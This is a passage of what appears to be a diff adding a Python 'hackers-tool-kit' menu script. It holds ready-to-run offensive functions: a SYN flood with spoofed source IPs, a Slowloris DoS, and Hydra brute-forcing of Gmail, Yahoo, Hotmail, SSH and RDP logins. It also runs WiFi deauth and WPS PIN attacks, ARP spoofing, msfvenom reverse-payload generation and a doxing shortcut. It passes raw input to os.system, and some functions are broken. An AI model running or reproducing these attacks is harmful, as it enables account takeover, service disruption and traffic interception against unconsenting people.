IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + 